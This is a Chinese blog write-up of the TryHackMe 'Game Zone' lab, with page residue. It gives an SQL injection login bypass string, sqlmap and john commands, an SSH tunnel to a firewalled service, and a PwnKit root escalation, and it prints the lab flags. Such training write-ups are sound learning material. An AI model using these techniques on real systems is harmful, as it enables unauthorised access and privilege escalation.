TryHackMe-进攻性渗透测试-04_GameZone

已于 2023-01-15 14:22:04 修改
阅读量240 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: 网络安全 安全 web安全
于 2022-12-24 10:36:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128426444
版权

Game Zone

本房间将介绍SQLi(手动或通过SQLMap利用此漏洞),破解用户散列密码,使用SSH隧道揭示隐藏的服务以及使用metasploit有效负载获得root权限。

循例 nmap扫,只开22和80

看web,一个怀念版的游戏登录界面

随手试了一下:

admin' or '1'='1'#

进去了

一个搜索页面,按照题目的要求,这里使用sqlmap

开启burp,正常发起搜索,然后在burp将该请求的信息导出到文件

使用sqlmap

┌──(root💀kali)-[/home/sugobet]
└─# sqlmap -r ./req.txt --dbms=mysql -dump

john爆破hash密码

┌──(root💀kali)-[/home/sugobet]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash --format=raw-sha256

登录ssh成功

agent47@gamezone:~$ cat user.txt
649ac17b1480ac13ef1e4fa579dac95c

知识点:

反向 SSH 端口转发指定将远程服务器主机上的给定端口转发到本地端的给定主机和端口。

-L 是一个本地隧道(你< - 客户端)。如果站点被阻止,您可以将流量转发到您拥有的服务器并查看它。例如,如果 imgur 在工作中被阻止,你可以执行 ssh -L 9000:imgur.com:80 user@example.com。 转到计算机上的localhost:9000,将使用其他服务器加载imgur流量。

-R 是一个远程隧道(YOU --> CLIENT)。您将流量转发到其他服务器供其他人查看。与上面的例子类似,但相反。

.

我们将使用一个名为 ss 的工具来调查主机上运行的套接字。

如果我们运行 ss -tulpn,它会告诉我们正在运行哪些套接字连接

论点	描述
-t	显示 TCP 套接字
-u	显示 UDP 套接字
-l	仅显示侦听套接字
-p	显示使用套接字的进程
-n	不解析服务名称

ss -tulpn

发现有个tcp 10000端口开启

在目标上使用curl能够得知其服务是web,但是似乎被防火墙拦截了,该端口无法被外网访问。

我们使用该ssh用户进行流量转发

┌──(root💀kali)-[/home/sugobet]
└─# ssh -L 8888:127.0.0.1:10000 agent47@10.10.200.149

将我们本地的8888端口流量通过ssh转发到目标的10000端口

访问我们本地的8888端口,看见是一个登录页面

我们已知的就是agent47的ssh登录凭据,尝试登录,成功

题目要求我们寻找cms的cve,但我偏不

我使用了pwnkit(CVE-2021-4034) 对pkexec的利用

agent47@gamezone:~$ ./PwnKit 
root@gamezone:/home/agent47# whoami
root
root@gamezone:/home/agent47# cat /root/root.txt
a4b945830144bdd71908d12d902adeee

看到ubuntu版本为16.04,我猜可能还存在cve-2021-3493 overlayfs利用

Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
TRY HACK ME | GAME ZONE 「SQLMAP+利用反向SSH提权」
AKAHRZ的博客
05-06 1485
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellT.
tryhackme gamezone 渗透测试
qq_52923396的博客
12-24 421
ssh -L 10000:localhost:10000 agent47@10.10.112.19,将目标系统的10000端口映射到本地10000端口,在访问本地的10000端口,进而访问服务。另一个表 sqlmap -r Ganmzone.txt --dbms=mysql -D=db --tables。2、在登录界面使用万能密码登录 用户名: 'or 1=1 -- - 密码为空。存在漏洞 ,编号为CVE-2012-2982。使用msf ,搜索漏洞编号,使用对应模块,
tryhackme渗透学习day01
weixin_59339137的博客
03-14 427
tryhackme给了一个room让我们跟着他一步步去寻找虚拟银行的后台,并利用漏洞。但大多都是前置知识,如红队的目标并不是打败蓝队,而是模拟足够的TTP。gobuster -u 网址 -w wordlist.txt dir。显示(Status:200)就是可以访问的隐藏网址。还有就是网络杀伤链了,最典型的洛克希德马丁杀伤链了。学到了一个命令程序gobuster。还有一点关于红队的知识。查找网页中的隐藏界面。
TryHackMe-VulnNet_Endgame
M1n9K1n9的博客
01-08 342
入侵这个模拟的易受攻击的基础设施。没有谜题。枚举是关键。VulnNet系列带着新的挑战回来了。这是本系列的最后一个挑战,妥协系统。枚举是关键。
TryHackMe-NahamStore(常见web漏洞 大杂烩)
M1n9K1n9的博客
01-19 1953
关于漏洞赏金和web常见漏洞 大杂烩 这个房间很有意思,涵盖了许多常见web漏洞。
GameZone_Fresh-Front
04-02
这是一个用引导的项目。 入门 首先,运行开发服务器: npm run dev # or yarn dev 用浏览器打开以查看结果。 您可以通过修改pages/index.js来开始编辑页面。 页面在您编辑文件时自动更新。... 可以在pages/api/hello...
gamezone-React-Native
02-12
"gamezone-React-Native-master"这个项目名称暗示了这是一个关于游戏的React Native项目。在实际项目中,我们通常会看到以下核心组成部分: 1. `index.js`:这是应用的入口文件,一般用于初始化React Native应用并...
gamezone-react-native
03-13
React Native Todo应用 一个简单的待办应用程序演示,用于使用React Native入门。 ...要求 安装步骤(如果适用) 克隆回购 运行npm install 运行npm start 您如何查看应用程序将取决于您的开发环境
gamezone_plugin
04-01
游戏区插件(gamezone_plugin)是一款专为Minecraft服务器设计的插件,适用于1.16.4版本。此插件的主要功能是提供玩家在游戏中的运行时间和加入/离开时的信息显示。以下是对这个插件及其相关技术的详细解释。 1. **...
GameZone_MS_Frontend:视频游戏商店数据管理应用程序的First Frontend。 在Vue.js中执行的前端
04-19
GameZone_MS_Frontend是一个专为视频游戏商店设计的数据管理应用程序的前端部分,它采用流行的JavaScript框架Vue.js来构建。Vue.js是一个轻量级、高能的前端开发框架,以其易于学习、灵活使用和强大的功能而受到...
HackTheBox - 学院【CPTS】复习5 - Linux | Windows 权限提升
M1n9K1n9的博客
07-07 706
在此我依然记录一些细节和以前曾忽略的东西。
TryHackMe-基本渗透测试
M1n9K1n9的博客
12-22 974
这里的主要目标是尽可能多地学习。确保您使用OpenVPN配置文件连接到我们的网络。部署机器并连接到我们的网络查找计算机公开的服务按照上面这句话,我们先使用nmap简单扫一圈┌──(root💀kali)-[]└─#nmap-sS访问80端口的web,好像没东西,到8080端口看一下,有网页。
TryHackMe-Watcher
M1n9K1n9的博客
01-09 308
一台利用 Web 漏洞利用以及一些常见权限提升技术的 boot2root Linux 机器。本来根据前辈的经验,我学习他们一天windows一天linux,但是很可惜tryhackme的windows标签的机器有点少,有点不太够做的样子。
TryHackMe-Blog
M1n9K1n9的博客
01-14 1656
比利·乔尔(Billy Joel)在他的家用电脑上写了一个博客,并开始工作。这将是非常棒的!枚举此框并找到隐藏在其上的 2 个标志!比利的笔记本电脑上有一些奇怪的事情。你能四处走动并得到你需要的东西吗?还是你会掉进兔子洞…为了使博客与 AWS 配合使用,您需要将 blog.thm 添加到 /etc/hosts 文件中。
TryHackMe-进攻渗透测试-08_Relevant
M1n9K1n9的博客
12-24 258
客户要求最小 提供有关评估的信息,希望参与 从恶意行为者的眼睛进行(黑匣子渗透 测试)。getshell翻车了,没事,按照已经做过的题的思路,我们换个shell后缀再尝试一下,asp不行尝试aspx。很好,那么根据一般思路,应该就是要上传个reverse shell然后在web上访问getshell。此外就没别的了,正当我想随便输入个错误路径时,发现没有任何错误页面和回显。此服务中允许使用任何工具或技术,但我们要求您先尝试手动利用。循例 nmap 扫,80的web访问不了,检索smb看看。
TryHackMe新手村
weixin_55154296的博客
04-17 7526
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8355
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
最新发布
为无为,事无事,味无味。
07-25 1113
本指南仅关注安全和隐私,而不关注能,可用或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1156
大语言模型提示注入攻击安全风险分析报告下载
PCLinuxOS 2013.02:深度指南,从Windows迁移、GIMP到Linux实用技巧
8. 游戏区 - "GameZone: Killing Floor" 探讨了在PCLinuxOS环境下玩一款名为Killing Floor的游戏体验和相关攻略。 9. 特色栏目 - "Fabled Foibler" 和 "PCLOS Is The BEST" 可能是论坛互动或者用户评价的内容,强调...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值